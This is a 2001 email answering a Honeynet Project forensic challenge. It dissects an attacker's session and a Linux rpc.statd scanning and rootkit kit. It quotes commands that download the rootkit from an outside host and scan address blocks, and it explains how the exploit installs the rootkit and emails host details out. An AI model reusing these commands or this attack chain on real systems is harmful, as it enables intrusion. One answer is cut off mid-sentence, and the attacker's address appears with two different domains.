From steve@shockley.net Sat Mar 17 19:44:08 2001 Date: Thu, 1 Mar 2001 00:08:41 -0500 From: Steve Shockley To: project@honeynet.org Subject: Scan of the month - 13 Thanks for the interesting challenge! It was fun getting to dust off those old neurons that knew some C code. Finally, someone found the tool that was scanning me forever on port 111! I've been seeing these for over a year now. Fortunately, the network I had that was getting scanned didn't have any RPC machines visible! ******** 1. What is the blackhat attempting to do with his command line syntax? ******** Blackhat entries marked with | |cd .mail |cd /usr/sbin/.mail Find a folder that has frequently-changing data and is infrequently browsed. |lynx www.becys.org/LUCKROOT.TAR |y Download the rootkit and save |tar -xvfz LUCKROOT.TAR |tar -xzvf Lu |tar -xzvf L |tar -xzvf LUCKROOT.TAR Unpack the rootkit. A little keyboard trouble here. Assuming the compromised host was in the US, it was probably between 12-3am in Romania, and I hear they don't have Jolt there. |cd luckroot Change to the new folder |./luckgo 216 210 Starts the script to scan for vulnerable hosts. In this case 216.210.x.x is being scanned. It appears the tool is versatile enough to scan a class A, B, or C address space. Most of these appear to be Class B sized subnets that are likely to be small businesses. |./luckgo 200 120 This one baffles me. ARIN has no record of a 200.120.x.x subnet, yet it was scanned twice. Maybe the victim's subnet? |./luckgo 64 120 |.luckgo 216 200 |./luckgo 216 200 Typo, again. |./luckgo 200 120 |./luckgo 63 1 |./luckgo 216 10 |./luckgo 210 120 Korean block, I understand they're notorious for unsecured mail hosts, probably unsecured servers as well. The language barrier doesn't help when trying to warn them of problems, either. |./luckgo 64 1 |./luckgo 216 1 |./luckgo 194 1 "Network of the Slovak Tax Offices." My my, shooting for the stars. |./luckgo 216 1 |./luckgo 210 128 |./luckgo 24 1 And of course, who could be a hacker without scanning @home. Without performing scans, it appears that 24.1.x.x may be cable modems in Southern California, for the most part. NET : 24.1.16.0 : SFBA-TCI-SNVL-1 : (San Francisco Bay Area?) NET : 24.1.128.0 : OCCA-COX-MSNV-1 : (Orange County CA?) NET : 24.1.144.0 : OCCA-COX-DNPT-1 : NET : 24.1.160.0 : OCCA-COX-ALSV-1 : NET : 24.1.176.0 : OCCA-COX-ORNG-1 : NET : 24.1.192.0 : AZ-COX-PHNX3-1 : (Phoenix, AZ?) |./luckgo 12 20 Small businesses connected through AT&T who figure "Who would want to hack me? I have nothing they'd want." ******** 2. What does the tool accomplish? ******** It appears to scan the selected netblocks for an RPC vulnerability on Redhat 6.2 machines with the rpc.statd vulnerability. It then ******** 3. How does the tool work? ******** The program luckgo is a script front end that boosts some egos, prints some instructions, does some basic validation on input, compiles luckscan-a and luckstatdx, then executes luckscan-a passing the target IP block and the port (hardcoded to 111/RPC). The luckscan-a program actually performs a scan for open 111/RPC using a connect() scan. When it finds an open port, it launches ./luckstatdx to attempt the exploit. When luckstatdx returns, it continues. The luckstatdx.c has been hacked to connect to the target machine. The connection() routine tries the rpc.rstatd vulnerability, and uses the shell to download a rootkit from http://www.becys.org/xzibit.tar.gz, unpack it, install it, and remove the archive. The xzibit rootkit turns off history logging and replaces netstat, ps, ifconfig and top, opens up some ports for its daemons, copies its own version of sshd, installs a CGI program if apache is installed, grabs some machine info and emails it to becys@becys.org, and finally deletes the rootkit install files. ******** 4. Is this tool a worm, or would you classify it as something else? ******** This doesn't seem to be a worm, since once the rootkit is installed it doesn't seem to go on to try to compromise additional hosts; however, I'm not able to verify this since I don't currently have a Red Hat machine at my disposal. ******** 5. Is this tool original, or is it simply based on previous tools? If based on previous tools, which ones and what is modified? ******** I haven't seen these tools before, but it's obvious that it's a hacked version of someone else's tool. The author of the luckgo script obviously likes to talk in h4x0r talk, and went to a lot of trouble to put blinks and colors using ANSI escape sequences. The usage instructions also don't cover all the possible arguments. The person who hacked luckstatdx.c seems to have a limited understanding of English syntax: // Becys was modify herre some cmd. // Aici cred ca trebuie un exit. whereas the person who wrote the original code has a good command of English and uses C-style comments ( /* */ ) instead of C++ style ( // ). I'm also guessing that luckscan-a.c and luckstatdx.c were written by different programmers because of subtle formatting variations, such as 2 char vs. 4 char indents, and: void fatal(char *err) vs. void usage(char *app) and the usage of printf() (luckscan-a) vs. fprintf(stderr,"...") (luckstatdx.c). The author of luckscan-a doesn't comment his code; I'm guessing the author of luckstatdx.c programs professionally, or at least has his code frequently looked at by people who will yell at him if there aren't any comments. ******** Bonus: What information can you obtain about who is using or created the tool? ******** Aside from what I've covered already, it's obvious that the tool was being run by someone who can read email at becys@becys.com. If it's the actual owner of the domain (and the info in whois is correct) there seems to be an easy trail back to him, since the address and phone number are listed there.